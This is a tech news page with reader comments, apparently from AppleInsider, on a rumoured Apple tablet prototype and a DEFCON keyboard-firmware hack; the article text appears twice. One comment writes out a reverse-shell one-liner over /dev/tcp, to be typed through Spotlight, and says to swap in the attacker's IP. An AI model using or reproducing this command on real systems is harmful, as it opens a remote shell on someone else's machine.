Tablet prototype "seen first-hand;" Apple keyboard hack detailed
A new report alleges that an analyst has seen a prototype of Apple's long-rumored tablet device in person, while the DEFCON conference debuted another dangerous hardware hack.
Apple's tablet reportedly "better than the average movie experience"
According to a new report from financial publication Barron's, the suspected tablet is so close to launch that other manufacturers have put their own tablet-style computers on hold until Apple's new product debuts. Author Tiernan Ray suggests that the portable device could possibly debut within the next six weeks. But According to AppleInsider's own sources, Apple's expected new tablet device, with a 10" display and integrated 3G service, is not anticipated to arrive before early 2010.
"One veteran analyst who has seen first-hand a prototype slate-style computer from Apple says the device could be announced in September for release in November," the story reads. "Whatever the exact dates, the computer industry is so anxious to see what Apple introduces that it has held off on competing designs until Apple CEO Steve Jobs gives the device his final blessing."
The report suggests a price of $699 to $799 for a device that would be primarily a media center and gaming machine. It would also be capable of playing high-definition movies.
"It's better than the average movie experience, when you hold this thing in your hands," Barron's anonymous source allegedly said.
Apple keyboard hack gives full control of systems
Along with the iPhone SMS exploit, the DEFCON convention in Las Vegas last week also revealed a vulnerability in Apple keyboards, exploiting the hardware's 8kb of flash memory and 256 bytes of RAM.
"This type of a hack however isn?t something where you can go into an Apple store and have an Apple ?genius? exorcise," George Ou writes, "because once the Apple keyboard is infected and locked; there is no practical way of undoing the damage."
The hack allows key logging, including during the boot phase, "which would unlock additional hardware encryption features." The hacker could also take full control of the host computer by launching a console.
The man who discovered the exploit alleges that it can be accomplished through vulnerabilities in OS X. He claims he knows how the issue can be fixed and has worked with Apple. But he said he is concerned that Apple will only fix the problem through a future OS X patch, which he believes would not be a surefire fix. He would rather see Apple lock the keyboard firmware to prevent future modifications.
Apple's tablet reportedly "better than the average movie experience"
According to a new report from financial publication Barron's, the suspected tablet is so close to launch that other manufacturers have put their own tablet-style computers on hold until Apple's new product debuts. Author Tiernan Ray suggests that the portable device could possibly debut within the next six weeks. But According to AppleInsider's own sources, Apple's expected new tablet device, with a 10" display and integrated 3G service, is not anticipated to arrive before early 2010.
"One veteran analyst who has seen first-hand a prototype slate-style computer from Apple says the device could be announced in September for release in November," the story reads. "Whatever the exact dates, the computer industry is so anxious to see what Apple introduces that it has held off on competing designs until Apple CEO Steve Jobs gives the device his final blessing."
The report suggests a price of $699 to $799 for a device that would be primarily a media center and gaming machine. It would also be capable of playing high-definition movies.
"It's better than the average movie experience, when you hold this thing in your hands," Barron's anonymous source allegedly said.
Apple keyboard hack gives full control of systems
Along with the iPhone SMS exploit, the DEFCON convention in Las Vegas last week also revealed a vulnerability in Apple keyboards, exploiting the hardware's 8kb of flash memory and 256 bytes of RAM.
"This type of a hack however isn?t something where you can go into an Apple store and have an Apple ?genius? exorcise," George Ou writes, "because once the Apple keyboard is infected and locked; there is no practical way of undoing the damage."
The hack allows key logging, including during the boot phase, "which would unlock additional hardware encryption features." The hacker could also take full control of the host computer by launching a console.
The man who discovered the exploit alleges that it can be accomplished through vulnerabilities in OS X. He claims he knows how the issue can be fixed and has worked with Apple. But he said he is concerned that Apple will only fix the problem through a future OS X patch, which he believes would not be a surefire fix. He would rather see Apple lock the keyboard firmware to prevent future modifications.
Comments
The lighter, the better. 300 g or less would be great.
The smaller, the better. Pocketable would be great.
Firewire for repairs via Target Disk Mode.
At least two USB 2 ports for wireless remote control and pendrive.
Ethernet port.
Wifi.
Bluetooth.
Touch screen.
Full and true GPS (TomTom compatible).
Full Mac OS X for full blown presentations from NATIVE Apple Keynote and Microsoft PowerPoint via video-out port to videoprojectors (with VGA adapter cable).
Here it is:
iNetbook rerendered
http://www.flickr.com/photos/fotoboer/3226244527
First picture of:
Next Apple moves will be Books and Games?
http://spidouz.wordpress.com/2008/09...ooks-and-games
We need thousands for our University.
"This type of a hack however isn?t something where you can go into an Apple store and have an Apple ?genius? exorcise," George Ou writes, "because once the Apple keyboard is infected and locked; there is no practical way of undoing the damage."
The hack allows key logging, including during the boot phase, "which would unlock additional hardware encryption features." The hacker could also take full control of the host computer by launching a console.
A few things, but I'm no expert, but this "hack" is a bit on the tedious, and somewhat impractical, side.
First, one would have to gain access to a host machine, and then manage to flash the keyboard without the user noticing (that could be done while the user is away I guess). If one could do all this, you may not need to corrupt the keyboard. Given the limited memory space in the keyboard flash, I'm not sure one could really have that much space to do much with the remaining memory not used by Apple.
One would still need to have some software on the OS to "phone home" with any information making it just a quirk on your run-of-the-mill keylogger, unless you keep info in RAM, then copy this to a flash drive to a hidden file, which sort of limits the damage to computers one may have physical access to. Could one squeeze this phone home program into the keyboard flash so it could recopy itself into memory if the user finds an unwanted process? Without more details, I can't say for sure, but I'm thinking no.
There are also more immediate problems. Which MCU is being used by the keyboard itself? Makes a big difference when you compile op codes for your new flash program. Is Apple using something from TI like a TUSB-based unit, or a product from Freescale? Makes a HUGE difference.
Just my $0.02.
One would still need to have some software on the OS to "phone home"
To call home all the keyboard has to do with OS X running is enter the following:
[COMMAND-SPACE]terminal[RETURN]exec /bin/sh 0</dev/tcp/127.0.0.1/4444 1>&0 2>&0[RETURN]
This will open a terminal using Spotlight and open a backdoor to shell. To utilize just replace "127.0.0.1" with hacker's IP address.
Source: http://www.blackhat.com/presentation...Firm-PAPER.pdf
-Clive
The report suggests a price of $699 to $799 for a device that would be primarily a media center and gaming machine. It would also be capable of playing high-definition movies.
[ View this article at AppleInsider.com ]
R.I.P. AppleTV & Mac Mini?
First, one would have to gain access to a host machine, and then manage to flash the keyboard without the user noticing (that could be done while the user is away I guess). If one could do all this, you may not need to corrupt the keyboard. Given the limited memory space in the keyboard flash, I'm not sure one could really have that much space to do much with the remaining memory not used by Apple.
Just my $0.02.
The keyboard flash can be hidden in almost any program, takes less than one second and doesn't require physical access or shutting down the machine. You don't even need to show a beach ball because <1 sec pauses are pretty normal.
Security isn't JUST a matter of securing the main (x86 in this case) processor, but all the embedded processors, such as keyboard, BMC, I2C, etc. The Linux community is out for blood right now and will ensure that Apple's security claims are discredited. Hell hath no fury like a geek scorned.
Next year is more like it.
The Linux community is out for blood right now and will ensure that Apple's security claims are discredited. Hell hath no fury like a geek scorned.
So, if I stuck Linux on my Mac Mini, how would Linux be any more "immune"?
"To infect your keyboard, the attacker only needs to exploit one of the many weaknesses in Mac OS X and Apple applications. Once exploited, the attacker only needs to drop less than 100 KB of payload to infect the keyboard and the attack takes less than 18 seconds."
I'm not saying there aren't any weaknesses in Mac OS, but his "once exploited" statement is a pretty big stretch. And if you've exploited the OS to the point where you can run a firmware update on the keyboard, why bother infecting the keyboard? Just do your dirty work directly.
The far more likely attack vector would be to go to an internet cafe that uses Macs and using your own computer, infect their keyboards. Ok, so don't ever go to an internet cafe, campus computer lab, etc, and use their keyboard on your Mac laptop.
"I asked Mr. Chen why Apple would leave the firmware open and he explained that Apple had a tendency to rush hardware to market which has resulted in shipped keyboards with flaws that needed firmware updates."
Apple rushes hardware to market?!? That's news to me!
Apple's tablet reportedly "better than the average movie experience"
What the hell does this mean?
What the hell does this mean?
There won't be any cellphones ringing other than your own. No screaming kids. Don't have to pay $10.00 for a Coke.
What the hell does this mean?
it makes popcorn
We also know they refresh their iPods in September and if the tablet is considered an iPod style product they might just release it then. Also if Steve Jobs is back to work they're going to want to get him out there making a keynote with something new and exciting to announce as soon as possible.
From the linked to article about the keyboard hack:
I'm not saying there aren't any weaknesses in Mac OS, but his "once exploited" statement is a pretty big stretch. And if you've exploited the OS to the point where you can run a firmware update on the keyboard, why bother infecting the keyboard? Just do your dirty work directly.
Because once you've infected the keyboard, the machine will be compromised, but you won't be able to recover it to an uninfected state just by reloading from Time Machine, and you won't be able to determine that there's an issue just by scanning the hard drive for an infection. You have to know that you need to look in the keyboard firmware.
There's something to be said for cryptographic signing of all drivers / firmware. But this does look like it could be a nice piece of work, and props to the guy who came up with it.
The smaller, the better. Pocketable would be great.
A pocketable, touch-screen tablet computer.... you mean the iPhone, right? Unless by "pocketable" you mean "able to be stuffed down the front of your pants." Because it's not going to get much bigger than the iPhone and still be pocketable.
R.I.P. AppleTV & Mac Mini?
Except the mini is a fully-functioning computer. I use mine to work with the entire Adobe suite, as well as to do video editing and 3D rendering. This tablet (if it indeed exists) will not be able to handle any of those tasks with the speed and skill of a mini.
iNetbook rerendered
http://www.flickr.com/photos/fotoboer/3226244527
It's exciting to think we may get a glimpse of this new product sooner than previously anticipated. I don't think they'll call it "iNetbook" though. Isn't Apple's current policy to incorporate "Mac" into the name of all of their computers?
I'm also hoping it's more fully-functional than being focused on watching movies and playing games. It'd be nice to have such a small form factor to do real work on. I'd like it to have a mini DisplayPort for connectivity to external display devices for presentations. Realistically, Apple can't make it too powerful and capable without cannibalizing their MacBook lines.
I look forward to seeing what Apple actually makes.
I'm also hoping it's more fully-functional than being focused on watching movies and playing games. It'd be nice to have such a small form factor to do real work on. I'd like it to have a mini DisplayPort for connectivity to external display devices for presentations. Realistically, Apple can't make it too powerful and capable without cannibalizing their MacBook lines.
I am there with you except for the last part. I really think it should be a smaller screened macbook minus the keyboard. Especially if they're thinking about charging $700-800 bucks for the thing.